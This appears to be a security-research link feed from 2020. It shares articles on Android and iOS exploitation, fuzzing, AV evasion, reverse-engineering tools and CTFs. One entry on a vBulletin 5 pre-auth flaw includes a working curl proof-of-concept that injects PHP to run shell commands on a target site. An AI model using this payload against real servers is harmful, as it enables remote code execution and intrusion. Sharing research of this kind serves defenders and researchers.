Exploiting Android Messengers with WebRTC: Part 1 https://googleprojectzero.blogspot.com/2020/08/exploiting-android-messengers-part-1.html #android #exploit #dukeBarman
Blogspot
Exploiting Android Messengers with WebRTC: Part 1
Posted by Natalie Silvanovich, Project Zero This is a three-part series on exploiting messenger applications using vulnerabilities in We...
Set of IDA Pro scripts for parsing GoLang types information stored in compiled binary https://github.com/sibears/IDAGolangHelper #ida #reverse #dukeBarman
GitHub
GitHub - sibears/IDAGolangHelper: Set of IDA Pro scripts for parsing GoLang types information stored in compiled binary
Set of IDA Pro scripts for parsing GoLang types information stored in compiled binary - sibears/IDAGolangHelper
MMS Exploit Part 4: MMS Primer, Completing the ASLR Oracle https://googleprojectzero.blogspot.com/2020/08/mms-exploit-part-4-completing-aslr-oracle.html #exploit #android #dukeBarman
Blogspot
MMS Exploit Part 4: MMS Primer, Completing the ASLR Oracle
Posted by Mateusz Jurczyk, Project Zero This post is the fourth of a multi-part series capturing my journey from discovering a vulnerabl...
Why are Frida and QBDI a Great Blend on Android? https://blog.quarkslab.com/why-are-frida-and-qbdi-a-great-blend-on-android.html #android #frida #dukeBarman
Quarkslab
Why are Frida and QBDI a Great Blend on Android? - Quarkslab's blog
This blog post dives into how to get a better understanding of an Android native function by taking full advantage of both Frida and QBDI.
Announcing the Seventh Annual Flare-On Challenge https://www.fireeye.com/blog/threat-research/2020/08/announcing-the-seventh-annual-flare-on-challenge.html #reverse #CTF #dukeBarman
Google Cloud Blog
7th Annual Flare-On Challenge | Reverse Engineering Challenge | Google Cloud Blog
The Front Line Applied Research & Expertise (FLARE) team is honored to announce that the popular Flare-On challenge will return for a seventh year.
SVE-2019-15230: A bug collision https://allsoftwaresucks.blogspot.com/2020/08/sve-2019-15230-bug-collision.html #android #dukeBarman
Blogspot
SVE-2019-15230: A bug collision
Researchers from Team T5 recently published their write-up on exploiting a bug in S-Boot and obtaining code execution in the Samsung Secure ...
Exploiting Android Messengers with WebRTC: Part 2 https://googleprojectzero.blogspot.com/2020/08/exploiting-android-messengers-part-2.html #exploit #android #dukeBarman
Blogspot
Exploiting Android Messengers with WebRTC: Part 2
Posted by Natalie Silvanovich, Project Zero This is a three-part series on exploiting messenger applications using vulnerabilities in WebR...
Attack Secure Boot of SEP https://github.com/windknown/presentations/raw/master/Attack_Secure_Boot_of_SEP.pdf #exploitation #iOS #dukeBarman
Fuzzing the Windows API for AV Evasion
https://winternl.com/fuzzing-the-windows-api-for-av-evasion/
#reverse #malware #fuzzing #win #Thatskriptkid
https://winternl.com/fuzzing-the-windows-api-for-av-evasion/
#reverse #malware #fuzzing #win #Thatskriptkid
winternl
Fuzzing the Windows API for AV Evasion
Malware Detection Systems (MDSs) use a technique called emulation as perhaps their most effective weapon against novel malware threats. Emulation does not rely on the static structure or signature ofβ¦
https://arstechnica.com/information-technology/2020/08/snapdragon-chip-flaws-put-1-billion-android-phones-at-risk-of-data-theft/ #Gyokuyou
Ars Technica
Snapdragon chip flaws put >1 billion Android phones at risk of data theft
Thereβs no word on when Google and phone makers will incorporate fix from Qualcomm.
A new pre-auth 0day RCE exploit for vBulletin 5:
https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/
https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/
POC: curl -s http://SITE/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec("id"); exit;'
#web #expdev #rce #0day #darw1nCTF for #r2con2020 is officially open: https://ctf.radare.org/welcome.html #reverse #CTF #dukeBarman
Introduction to Whiteboxes and Collision-Based Attacks With QBDI
https://blog.quarkslab.com/introduction-to-whiteboxes-and-collision-based-attacks-with-qbdi.html
#crypto #whitebox #waes #darw1n
https://blog.quarkslab.com/introduction-to-whiteboxes-and-collision-based-attacks-with-qbdi.html
#crypto #whitebox #waes #darw1n
Quarkslab
Introduction to Whiteboxes and Collision-Based Attacks With QBDI - Quarkslab's blog
This post is a noob-friendly introduction to whiteboxes along with the presentation and explanation of a (not-new) collision-based attack. The attack is demonstrated against a public whitebox, using QBDI to instrument and analyze the target in order to produceβ¦
Fuzzing JavaScript Engines with Aspect-preserving Mutation
https://github.com/sslab-gatech/DIE
#reverse #expdev #fuzzing #javascript #darw1n
https://github.com/sslab-gatech/DIE
#reverse #expdev #fuzzing #javascript #darw1n
GitHub
GitHub - sslab-gatech/DIE: Fuzzing JavaScript Engines with Aspect-preserving Mutation
Fuzzing JavaScript Engines with Aspect-preserving Mutation - sslab-gatech/DIE
Storm - a blackbox mutational fuzzer for detecting critical bugs in SMT solvers Article: https://numairmansur.github.io/STORM.pdf Code: https://github.com/Practical-Formal-Methods/storm #fuzzing #dukeBarman
Enumy - Linux post exploitation privilege escalation enumeration https://github.com/luke-goddard/enumy #links #linux #ctf #exploitation
GitHub
GitHub - luke-goddard/enumy: Linux post exploitation privilege escalation enumeration
Linux post exploitation privilege escalation enumeration - GitHub - luke-goddard/enumy: Linux post exploitation privilege escalation enumeration
RetDec IDA plugin version 1.0 is out:
https://engineering.avast.io/retdec-ida-plugin-v1-0-is-out/
#reverse #ida #KosBeg
https://engineering.avast.io/retdec-ida-plugin-v1-0-is-out/
#reverse #ida #KosBeg
idapm is IDA Plugin Manager via GitHub Repository https://github.com/tkmru/idapm #reverse #ida #dukeBarman
GitHub
GitHub - tkmru/idapm: idapm is IDA Plugin Manager via GitHub Repository.
idapm is IDA Plugin Manager via GitHub Repository. - tkmru/idapm